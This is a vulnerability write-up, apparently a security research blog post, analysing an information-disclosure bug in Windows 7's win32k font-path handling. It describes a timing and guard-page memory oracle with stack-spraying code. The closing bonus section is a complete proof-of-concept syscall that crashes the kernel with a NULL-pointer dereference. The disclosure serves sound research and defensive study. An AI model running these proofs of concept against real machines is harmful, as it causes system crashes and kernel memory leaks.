A story of win32k!cCapString, or unicode strings gone bad

In the most recent blog post (“Fun facts: Windows kernel and guard pages”), we learned how the code coverage of kernel routines referencing user-mode memory can be determined by taking advantage of the fact that kernel-mode code triggers guard page exceptions in the same way as user-mode code does. Today, I will show how the trick can be used in a practical attack against an actual 0-day vulnerability in the Windows kernel. Don’t get too excited though: the bug is a very peculiar kind of information disclosure, not particularly useful in any sort of real-life attack. Despite its minimal severity, which follows from how little information it makes it possible to leak, it is a great example of how misusing the UNICODE_STRING structure and the related kernel routines can open up a security loophole in the operating system.

Microsoft has been aware of the issue for over 4 months, but due to its low severity, I believe it is rather unlikely it will be fixed any time soon.

Unicode string security

All of the most recent versions of the Windows operating system (starting with Windows 2000) internally handle textual strings using the UTF-16 encoding and a UNICODE_STRING structure defined as follows:

typedef struct _LSA_UNICODE_STRING {
  USHORT Length;
  USHORT MaximumLength;
  PWSTR  Buffer;
} LSA_UNICODE_STRING, *PLSA_UNICODE_STRING, UNICODE_STRING, *PUNICODE_STRING;

Together with the structure definition, both the user- and kernel-mode APIs provide a set of functions designed to initialize, examine, compare and otherwise operate on unicode strings, e.g. RtlInitUnicodeString, RtlAnsiStringToUnicodeString or RtlAppendUnicodeStringToString. In the above listing, the Length field represents the current length of the string in bytes (it must be a multiple of two due to the encoding used), MaximumLength indicates the total capacity of the buffer in bytes and Buffer points to the actual data. Note that both the Length and MaximumLength fields are only 16 bits wide, which is more than enough to accommodate the size of any string used during normal operation of the system. Perhaps contrary to intuition, the relatively limited ranges of the integers (which make it easy to craft a string of the maximum size) do not pose any serious threat with regard to integer arithmetic, because overflowing either field doesn’t give the attacker much of an edge. If you think about it, getting Length to be smaller than the actual length of the string can only lead to overwriting the existing buffer contents, but will never result in writing past the pool allocation. Similarly, setting MaximumLength to an overly small number only puts a stricter limit on how many bytes can be stored in the corresponding buffer, or causes all subsequent calls to fail due to an invalid Length > MaximumLength condition. As a consequence, integer overflows are not of much interest in this context.
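To make the byte-based bookkeeping concrete, here is a minimal portable sketch. The CountedString type and the counted_from_terminated helper are hypothetical stand-ins written for this post (uint16_t plays the role of WCHAR); they are not part of any Windows API and only mirror the field semantics described above.

```c
#include <stddef.h>
#include <stdint.h>

/* Portable stand-in for UNICODE_STRING (hypothetical, for illustration). */
typedef struct {
  uint16_t Length;        /* bytes currently in use, terminator excluded */
  uint16_t MaximumLength; /* bytes available in Buffer */
  uint16_t *Buffer;       /* UTF-16 code units */
} CountedString;

/* Describes an existing nul-terminated UTF-16 buffer in place.
   Returns 0 on success, -1 if the byte count does not fit in 16 bits. */
int counted_from_terminated(CountedString *out, uint16_t *text) {
  size_t chars = 0;
  while (text[chars] != 0) {
    chars++;
  }

  size_t bytes = chars * sizeof(uint16_t);
  if (bytes + sizeof(uint16_t) > UINT16_MAX) {
    return -1; /* would not fit in the 16-bit fields */
  }

  out->Length = (uint16_t)bytes;
  out->MaximumLength = (uint16_t)(bytes + sizeof(uint16_t));
  out->Buffer = text;
  return 0;
}
```

For a three-character string, the helper reports a Length of 6 bytes and a MaximumLength of 8 bytes, the extra two bytes being the terminator.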

In general, the overall unicode-handling functionality is trivial enough that it is fairly uncommon to observe purely unicode-based vulnerabilities fixed in the Windows kernel. Interestingly, there are still several things that can go wrong as a result of programming mistakes made by kernel-mode developers, such as:

  • Assuming that the Length or MaximumLength of a user-supplied UNICODE_STRING is divisible by two. Depending on various factors, this can lead to denial of service or even local elevation of privilege conditions under specific circumstances. For example, imagine the following snippet of device driver code:
    PUNICODE_STRING UserString = /* user-controlled source */;
    PWCHAR LocalString;
    UINT i;
    
    LocalString = ExAllocatePool(PagedPool, UserString->Length);
    if (LocalString != NULL) {
      for (i = 0; i != UserString->Length; i += sizeof(WCHAR)) {
        LocalString[i / sizeof(WCHAR)] = UserString->Buffer[i / sizeof(WCHAR)];
      }
    }

    If a rogue user provided an input string with an odd number of bytes, the termination condition of the for loop would never be met, resulting in writes past the pool-based buffer until the end of either the source or the destination region was reached, at which point the system would crash.

  • Assuming that calls to Unicode API functions always succeed. If you look closely, it turns out that a number of the string manipulation routines can fail under specific conditions, and the failure is signaled by an appropriate error code. For example, MSDN lists the following two possible return values for the RtlAppendUnicodeStringToString function:
    • STATUS_SUCCESS: The source string was successfully appended to the destination counted string. The destination string length is updated to include the appended bytes.
    • STATUS_BUFFER_TOO_SMALL: The destination string length is too small to allow the source string to be concatenated. Accordingly, the destination string length is not updated.

    The consequences of assuming that every operation succeeds can vary, depending on what other assumptions are derived from the original one. If a buggy driver assumes that once an “append” call completes, the Length field has a specific value without really verifying it, it can end up disclosing random pool bytes or doing something even more dangerous.

  • Directly tampering with the UNICODE_STRING fields. The Unicode API is designed so that it is impossible to cause memory corruption by using only the system-provided functions. However, modifying the values on one’s own is very easy to get wrong, at the risk of introducing a security vulnerability.
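The first pitfall can be avoided by validating the header before trusting it. The sketch below is a user-mode model only: CountedString, counted_is_sane and counted_copy are hypothetical names, malloc stands in for a pool allocation, and a real driver would additionally have to probe and capture the user-mode structure before checking it.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdlib.h>

/* Portable stand-in for UNICODE_STRING (hypothetical, for illustration). */
typedef struct {
  uint16_t Length;
  uint16_t MaximumLength;
  uint16_t *Buffer;
} CountedString;

/* Returns 1 when the header is internally consistent, 0 otherwise. */
int counted_is_sane(const CountedString *s) {
  if (s->Length % sizeof(uint16_t) != 0) return 0;        /* odd byte count */
  if (s->MaximumLength % sizeof(uint16_t) != 0) return 0; /* odd capacity */
  if (s->Length > s->MaximumLength) return 0;
  if (s->Length != 0 && s->Buffer == NULL) return 0;
  return 1;
}

/* Copies the characters into a fresh allocation owned by the caller.
   Returns NULL on an inconsistent header, an empty string or allocation
   failure. The loop is bounded with '<' on a character count, so it
   terminates even if the validation above were removed. */
uint16_t *counted_copy(const CountedString *s) {
  if (!counted_is_sane(s) || s->Length == 0) {
    return NULL;
  }

  size_t chars = s->Length / sizeof(uint16_t);
  uint16_t *copy = malloc(s->Length);
  if (copy == NULL) {
    return NULL;
  }

  for (size_t i = 0; i < chars; i++) {
    copy[i] = s->Buffer[i];
  }
  return copy;
}
```

With this shape, a string whose Length is 3 is rejected up front instead of driving the copy loop past the end of the allocation.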

Now back to the symbol from the title of the post: win32k!cCapString. A pseudocode C-like version of the routine found in win32k.sys on a fully patched Windows 7 SP1 32-bit platform is shown below:

INT cCapString(WCHAR *dst, WCHAR *src, UINT len) {
  PWCHAR src_end;
  PWCHAR i;
  INT real_len;
  UNICODE_STRING DestinationString;
  UNICODE_STRING SourceString;

  src_end = &src[len - 1];
  for (i = src; i < src_end; i++) {
    if (*i == L'\0') {
      break;
    }
  }

  real_len = i - src;
  if (real_len) {
    SourceString.Length = 2 * real_len;
    SourceString.MaximumLength = 2 * len;
    SourceString.Buffer = src;

    DestinationString.MaximumLength = 2 * len;
    DestinationString.Buffer = dst;

    RtlUpcaseUnicodeString(&DestinationString, &SourceString, 0);
  }

  dst[real_len] = L'\0';
  return real_len;
}

The routine is very simple in its principle: given a source unicode string, a destination buffer and its size expressed in wide characters, the function copies an upper-case version of src to dst. When you investigate the code, it becomes apparent that there are at least three problems with the implementation:

  1. Given a long enough input string, the 2 * real_len and 2 * len expressions assigned to SourceString.Length, SourceString.MaximumLength and DestinationString.MaximumLength can overflow the USHORT type. This in itself wouldn’t be too bad if the values assigned to SourceString.Length and DestinationString.MaximumLength were consistent. However, due to the fact that real_len is calculated separately, it is theoretically possible to set each field to any value independently, including numbers that result in an erroneous Length > MaximumLength condition. When RtlUpcaseUnicodeString encounters a SourceString.Length > DestinationString.MaximumLength situation, here’s what happens:
      else if (SourceString->Length > DestinationString->MaximumLength) {
        return STATUS_BUFFER_OVERFLOW;
      }
  2. The return value of RtlUpcaseUnicodeString is not verified in any way.
  3. The cCapString function itself doesn’t implement error handling, thus it is unable to inform the caller about a potential problem in capturing the input string. Instead, it always returns the “real length” of src as the number of captured characters.
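The truncation from the first item is easy to check by hand. The following sketch simply replays the three 16-bit assignments from the pseudocode; the Fields structure and both function names are made up for this illustration.

```c
#include <stdint.h>

/* The three 16-bit values computed by cCapString (hypothetical container). */
typedef struct {
  uint16_t src_length;  /* SourceString.Length */
  uint16_t src_maximum; /* SourceString.MaximumLength */
  uint16_t dst_maximum; /* DestinationString.MaximumLength */
} Fields;

/* len and real_len are expressed in characters, as in the pseudocode. */
Fields truncated_fields(uint32_t len, uint32_t real_len) {
  Fields f;
  f.src_length = (uint16_t)(2 * real_len); /* keeps the low 16 bits only */
  f.src_maximum = (uint16_t)(2 * len);
  f.dst_maximum = (uint16_t)(2 * len);
  return f;
}

/* Mirrors the Length > MaximumLength check quoted above. */
int upcase_would_fail(Fields f) {
  return f.src_length > f.dst_maximum;
}
```

For len = 32768, the product 2 * len equals 65536, which truncates to 0, so any non-empty prefix makes the check fail.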

Based on the above, it is possible to cause the function to misbehave by not writing anything to dst apart from the terminating null (due to the failing RtlUpcaseUnicodeString call), yet returning the number of non-null characters at the start of the input string as the number of captured characters. This is achieved by passing a string consisting of 32768 characters, for which 2 * len wraps around to zero in the 16-bit MaximumLength fields, and putting a unicode null at the desired position, which later determines the cCapString return value. Now, let’s find out whether callers of the buggy function allow user-mode to pass arbitrarily-sized strings in the first place!
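The behaviour described above can be reproduced in a small user-mode model. Everything here is an assumption made for illustration: model_upcase is a simplified, ASCII-only stand-in for RtlUpcaseUnicodeString, the status constants are invented, and model_cap_string follows the control flow of the pseudocode rather than the actual win32k.sys binary.

```c
#include <stddef.h>
#include <stdint.h>

#define MODEL_SUCCESS 0
#define MODEL_BUFFER_OVERFLOW 1

typedef struct {
  uint16_t Length;
  uint16_t MaximumLength;
  uint16_t *Buffer;
} CountedString;

/* Simplified stand-in for RtlUpcaseUnicodeString without allocation. */
static int model_upcase(CountedString *dst, const CountedString *src) {
  if (src->Length > dst->MaximumLength) {
    return MODEL_BUFFER_OVERFLOW; /* nothing is written to dst */
  }
  size_t chars = src->Length / sizeof(uint16_t);
  for (size_t i = 0; i < chars; i++) {
    uint16_t c = src->Buffer[i];
    dst->Buffer[i] = (c >= 'a' && c <= 'z') ? (uint16_t)(c - 'a' + 'A') : c;
  }
  dst->Length = src->Length;
  return MODEL_SUCCESS;
}

/* Same control flow as the cCapString pseudocode, status ignored. */
int model_cap_string(uint16_t *dst, uint16_t *src, uint32_t len) {
  uint32_t real_len = 0;
  while (real_len + 1 < len && src[real_len] != 0) {
    real_len++;
  }

  if (real_len != 0) {
    CountedString s = {(uint16_t)(2 * real_len), (uint16_t)(2 * len), src};
    CountedString d = {0, (uint16_t)(2 * len), dst};
    (void)model_upcase(&d, &s); /* result discarded, as in the original */
  }

  dst[real_len] = 0;
  return (int)real_len;
}
```

Calling the model with a 32768-character source that has a null at index 3 returns 3 while leaving the first three words of dst exactly as they were before the call.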

On Windows 7, the routine is invoked from 16 different locations. While originally investigating the issue, I have gone through the trouble of looking into each of them, concluding that the only one with any exploitability potential is win32k!bCheckAndCapThePath, implemented as follows:

BOOLEAN bCheckAndCapThePath(PWCHAR dst, PWCHAR src, ULONG len, ULONG exp_files) {
  INT act_files;
  ULONG i;

  /* Sanitize the (src, len) pair. */

  if (src[len - 1] != L'\0') {
    return FALSE;
  }

  cCapString(dst, src, len);

  for (i = 0, act_files = 1; i < len; i++) {
    if (dst[i] == L'|') {
      dst[i] = L'\0';
      act_files++;
    }
  }

  return (exp_files == act_files);
}

What the function does is basically call cCapString over the input arguments, count the number of the “|” unicode character instances in the resulting buffer and check if the count matches one of its arguments. Once again, the routine unconditionally assumes that cCapString always succeeds, and doesn’t even bother checking or using its return value – instead, it iterates through all len characters. There are two scenarios in which the function will start accessing uninitialized bytes in dst: one because of the bugs in cCapString, and one because of bCheckAndCapThePath itself:

  1. If the nested RtlUpcaseUnicodeString call fails entirely, none of the bytes in dst are properly initialized. The L'|' characters are counted in a buffer that only contains garbage.
  2. If we insert a nul character somewhere inside of the string in addition to the end, real_len will be smaller than len, thus dst will be only partially filled. Because the function discards all signs of the real length of dst (return value of cCapString, nul character at the end), the “for” loop will iterate through garbage data of size len – real_len.
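The second scenario can be illustrated with a model of the counting loop. Both functions below are hypothetical: model_count_files repeats the loop from the pseudocode, while model_count_files_bounded is one possible way of limiting the scan to the captured characters, shown only for contrast and not taken from any actual fix.

```c
#include <stdint.h>

/* Counts separators across all len words of dst, replacing each with a
   terminator, exactly like the loop in the pseudocode. */
int model_count_files(uint16_t *dst, uint32_t len) {
  int act_files = 1;
  for (uint32_t i = 0; i < len; i++) {
    if (dst[i] == '|') {
      dst[i] = 0;
      act_files++;
    }
  }
  return act_files;
}

/* Contrast: never looks past the characters that were actually captured. */
int model_count_files_bounded(uint16_t *dst, uint32_t len, uint32_t captured) {
  uint32_t limit = (captured < len) ? captured : len;
  int act_files = 1;
  for (uint32_t i = 0; i < limit; i++) {
    if (dst[i] == '|') {
      dst[i] = 0;
      act_files++;
    }
  }
  return act_files;
}
```

Given a four-word buffer holding one captured character, its terminator and two stale words, one of which happens to be 0x007c, the first function reports two files and the second reports one.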

The bCheckAndCapThePath routine has three different callers: NtGdiAddFontResourceW, NtGdiRemoveFontResourceW and NtGdiGetFontResourceInfoInternalW. The parameters passed to bCheckAndCapThePath are based on the syscalls’ arguments in the following manner:

  • dst is a kernel-mode buffer, allocated from:
    • the syscall handler’s stack (a local buffer), if the length is below or equal to 160 bytes.
    • session paged pool, if the length is below or equal to 2088 bytes (for NtGdiAddFontResourceW), or 40960000 bytes (for NtGdiRemoveFontResourceW and NtGdiGetFontResourceInfoInternalW)
  • src is a user-controlled pointer.
  • len is the user-controlled length of dst.
  • files is a user-controlled number.

This means that the first bug (integer overflow in MaximumLength) can be triggered using the “Remove” and “Get” system calls because they allow long enough strings to be passed down the call chain, and the second one (misplaced nul) can be triggered with all three services. Simply put, the vulnerability allows an attacker to ask the following question:

Is the number of the “0x007c” words found at even offsets of an uninitialized stack buffer (up to 160 bytes long) or session paged pool buffer (up to 40960000 bytes) equal to x?

where the value of x and the length of the buffer are controlled by the attacker. If we don’t guess correctly, we never get a second chance for the same memory region, as all instances of 0x007c are instantly replaced with 0x0000 inside the counting loop. The answer to the question is returned in the form of a boolean value from the bCheckAndCapThePath call; in order to disclose the information to user-mode, that return value must be somehow recovered from ring-3. If we decide to use NtGdiRemoveFontResourceW for further exploitation, it turns out that its code execution path highly depends on the result of the bCheckAndCapThePath invocation. More precisely, the following construct can be found in the function:

if (bCheckAndCapThePath(dst, src, len, files)) {
  /* Sanitize "PDWORD a6", the sixth syscall parameter */

  UINT value = a6[1];

  /* Implement the rest of the functionality */
}

The fact that the user-supplied pointer from the sixth parameter is referenced if and only if the previous function call succeeds can be taken advantage of in two different ways. The first idea involves carrying out a timing attack: we can pass an invalid pointer as a6, thus getting the kernel to generate an exception in case of a correct guess. There is a measurable difference between the time the kernel takes to dispatch the exception and the time it takes to exit the syscall handler normally. The following list of values illustrates the timings (in CPU ticks) achieved for buffer size=160 and a correct guess (no 0x007c words in the region) vs. an incorrect guess (one hundred 0x007c words in the region, obviously false):

1. correct: 128404 ticks, incorrect: 730 ticks
2. correct: 8751 ticks, incorrect: 643 ticks
3. correct: 4462 ticks, incorrect: 614 ticks
4. correct: 4395 ticks, incorrect: 640 ticks
5. correct: 4169 ticks, incorrect: 600 ticks
6. correct: 4221 ticks, incorrect: 593 ticks
7. correct: 4204 ticks, incorrect: 588 ticks
8. correct: 4145 ticks, incorrect: 596 ticks
9. correct: 4157 ticks, incorrect: 596 ticks
10. correct: 4143 ticks, incorrect: 594 ticks
11. correct: 4160 ticks, incorrect: 596 ticks
12. correct: 4334 ticks, incorrect: 643 ticks
13. correct: 4131 ticks, incorrect: 591 ticks
14. correct: 4160 ticks, incorrect: 596 ticks
15. correct: 4143 ticks, incorrect: 596 ticks
16. correct: 4145 ticks, incorrect: 591 ticks
Minimum correct: 4131 ticks, incorrect: 588 ticks

As is clearly visible, it takes approximately seven times longer for the system call to complete if we make a correct guess, making it trivially distinguishable from an incorrect one. As you can probably imagine at this point, the attack can also be conducted in a more deterministic way, by making use of the technique discussed last time. Instead of passing an invalid pointer and hoping for an exception to occur, we can set it to a PAGE_GUARD-protected memory page and later determine if the memory was accessed by testing the guard bit of the page!
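The comparison of timings can be expressed in a few lines. This is only a sketch of the decision step: the function names are invented, taking the minimum of several samples is my own choice for suppressing noise such as the very first measurement in the list, and the midpoint threshold is an assumption that happens to work for figures as far apart as the ones above.

```c
#include <stddef.h>
#include <stdint.h>

/* Smallest sample in the series; UINT64_MAX for an empty series. */
uint64_t min_ticks(const uint64_t *samples, size_t count) {
  uint64_t best = UINT64_MAX;
  for (size_t i = 0; i < count; i++) {
    if (samples[i] < best) {
      best = samples[i];
    }
  }
  return best;
}

/* Returns 1 if the observation lies above the midpoint between the two
   baselines, i.e. looks like the slower exception-dispatching path. */
int took_slow_path(uint64_t observed, uint64_t fast_baseline,
                   uint64_t slow_baseline) {
  uint64_t threshold = fast_baseline + (slow_baseline - fast_baseline) / 2;
  return observed > threshold;
}
```

Using the minimums from the table as baselines (588 and 4131 ticks), the threshold lands at 2359 ticks, comfortably between the two groups of measurements.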

It is rather uncommon to observe the 0x007c word in random garbage on the stack or pool allocations. In order to test if the exploit implementing the guard page idea works, we can intentionally spray the kernel-mode stack of the current thread with the expected value, as described in the “nt!NtMapUserPhysicalPages and Kernel Stack-Spraying Techniques” post from two years ago:

  CONST ULONG kSprayingSize = 4096;

  PWORD lpSprayBuffer = (PWORD)malloc(kSprayingSize);
  for (ULONG i = 0; i < kSprayingSize / sizeof(WORD); i++) {
    lpSprayBuffer[i] = 0x007c;
  }

  SystemCall(__NR_NtMapUserPhysicalPages,
             NULL,
             kSprayingSize / sizeof(DWORD),
             lpSprayBuffer);

After running the above snippet of code, we can proceed to disclose the locations of the magic words on the stack. In order to capture the precise location of each of them, we need to scan the stack progressively, i.e. iterate through the buffer sizes 1, 2, 3, …, 80 and set the guessed “|” count to 1. This way, we can mitigate the fact that each guess attempt removes the special characters from the examined memory area. The final result of a working proof of concept exploit is the following output:

Word 0x007c found at kernel stack offsets: {0xc, 0xe, }

which matches the actual stack layout:

0: kd> dw eax
8a727b58  fe74 0022 52c0 86cd e4d0 85af 007c 007c <=== here
8a727b68  0400 0000 e220 85af 63b0 86f2 9350 c03a
8a727b78  58d7 832e ab6c 8462 7bec 8a72 1000 8074
8a727b88  0110 0000 0008 0000 0100 0000 0000 0000
8a727b98  0000 0000 1000 0000 0000 0000 4934 0002
8a727ba8  7c1c 8a72 1638 8329 ff7e 0003 0110 0000
8a727bb8  a335 7526 0000 0000 0016 0000 0000 0000
8a727bc8  0000 0000 0000 0001 1000 0000 0000 0000
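The reasoning behind the progressive scan can be checked against a simplified model. The code below does not talk to the kernel at all: model_oracle is a hypothetical stand-in for a single guess (it counts and clears the 0x007c words in a prefix of a plain array), and the model ignores details of the real routine such as the terminator that cCapString writes into dst.

```c
#include <stddef.h>
#include <stdint.h>

/* One destructive guess: counts the 0x007c words among the first `words`
   entries, clears them, and reports whether the count equals `guess`. */
int model_oracle(uint16_t *region, size_t words, unsigned guess) {
  unsigned found = 0;
  for (size_t i = 0; i < words; i++) {
    if (region[i] == 0x007c) {
      region[i] = 0;
      found++;
    }
  }
  return found == guess;
}

/* Grows the examined prefix one word at a time. Every earlier word has
   already been cleared, so a count of one can only come from the newest
   word. Stores byte offsets and returns how many were found. */
size_t model_scan(uint16_t *region, size_t words, size_t *offsets,
                  size_t max_offsets) {
  size_t n = 0;
  for (size_t size = 1; size <= words; size++) {
    if (model_oracle(region, size, 1) && n < max_offsets) {
      offsets[n++] = (size - 1) * sizeof(uint16_t);
    }
  }
  return n;
}
```

Fed with the first row of the dump above, the model reports the byte offsets 0xc and 0xe, the same values the proof of concept printed.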

The source code of both proof of concept exploits for Windows 7 32-bit can be found here and here.

Bonus

In addition to the Unicode bug, there is also a fairly trivial NULL Pointer Dereference issue of a Denial of Service class in NtGdiGetFontResourceInfoInternalW. If we pass in valid syscall parameters, with the exception of the 4th argument which needs to be a number larger than 0x2710000 (e.g. INT_MAX), the following bugcheck is triggered:

FAULTING_IP: 
win32k!GetFontResourceInfoInternalW+183
82ea70ab 8901            mov     dword ptr [ecx],eax

TRAP_FRAME:  9785ba28 -- (.trap 0xffffffff9785ba28)
ErrCode = 00000002
eax=00000001 ebx=fffffffe ecx=00000000 edx=00000021 esi=ffac2568 edi=00000000
eip=82ea70ab esp=9785ba9c ebp=9785baac iopl=0         nv up ei pl nz na po nc
cs=0008  ss=0010  ds=0023  es=0023  fs=0030  gs=0000             efl=00010202
win32k!GetFontResourceInfoInternalW+0x183:
82ea70ab 8901            mov     dword ptr [ecx],eax  ds:0023:00000000=????????
Resetting default scope

DEFAULT_BUCKET_ID:  INTEL_CPU_MICROCODE_ZERO

BUGCHECK_STR:  0x8E

PROCESS_NAME:  a.exe

CURRENT_IRQL:  2

LAST_CONTROL_TRANSFER:  from 83330d8f to 832cc570

STACK_TEXT:  
9785afdc 83330d8f 00000003 06a179e1 00000065 nt!RtlpBreakWithStatusInstruction
9785b02c 8333188d 00000003 9785b430 00000000 nt!KiBugCheckDebugBreak+0x1c
9785b3f0 83330c2c 0000008e c0000005 82ea70ab nt!KeBugCheck2+0x68b
9785b414 833063be 0000008e c0000005 82ea70ab nt!KeBugCheckEx+0x1e
9785b9b8 832904a6 9785b9d4 00000000 9785ba28 nt!KiDispatchException+0x1ac
9785ba20 8329045a 9785baac 82ea70ab badb0d00 nt!CommonDispatchException+0x4a
9785baac 82e7141a 9785bb54 00000021 00000001 nt!Kei386EoiHelper+0x192
9785bc10 8328f8ba 0022febe 00000021 00000001 win32k!NtGdiGetFontResourceInfoInternalW+0x103
9785bc10 00401397 0022febe 00000021 00000001 nt!KiFastCallEntry+0x12a
WARNING: Stack unwind information not available. Following frames may be wrong.
0022fe88 0040141b 000010b9 0022febe 00000021 a+0x1397
0022ff18 004010b9 00000000 7ffdd000 0022ff68 a+0x141b
0022ff68 00401284 00000001 00000000 00000000 a+0x10b9
0022ff88 7570ed6c 7ffdd000 0022ffd4 7718377b a+0x1284
0022ff94 7718377b 7ffdd000 7476b3b1 00000000 kernel32!BaseThreadInitThunk+0xe
0022ffd4 7718374e 0040126c 7ffdd000 00000000 ntdll!__RtlUserThreadStart+0x70
0022ffec 00000000 0040126c 7ffdd000 00000000 ntdll!_RtlUserThreadStart+0x1b

STACK_COMMAND:  kb

FOLLOWUP_IP: 
win32k!GetFontResourceInfoInternalW+183
82ea70ab 8901            mov     dword ptr [ecx],eax

SYMBOL_STACK_INDEX:  0

SYMBOL_NAME:  win32k!GetFontResourceInfoInternalW+183

FOLLOWUP_NAME:  MachineOwner

MODULE_NAME: win32k

IMAGE_NAME:  win32k.sys

DEBUG_FLR_IMAGE_TIMESTAMP:  51301bf1

FAILURE_BUCKET_ID:  0x8E_win32k!GetFontResourceInfoInternalW+183

BUCKET_ID:  0x8E_win32k!GetFontResourceInfoInternalW+183

Followup: MachineOwner
---------

The source code of a proof of concept exploit for Windows 7 32-bit is as follows:

#include <limits.h>
#include <windows.h>

#define __NR_NtGdiGetFontResourceInfoInternalW 0x10b9

ULONG STDCALL SystemCall(DWORD ApiNumber, ...) {
  __asm("lea edx, [ebp+0x0c]");
  __asm("mov eax, %0":"=m"(ApiNumber));
  __asm("int 0x2e");
  __asm("leave");
  __asm("ret");
}

int main() {
  CONST WCHAR pwszFiles[] = L"\\??\\C:\\WINDOWS\\FONTS\\AHRONBD.TTF";

  LoadLibrary("user32.dll");
  SystemCall(__NR_NtGdiGetFontResourceInfoInternalW,
             pwszFiles,
             sizeof(pwszFiles) / sizeof(WCHAR),
             1,
             INT_MAX,
             0xAAAAAAAA,
             0xBBBBBBBB,
             0);

  return 0;
}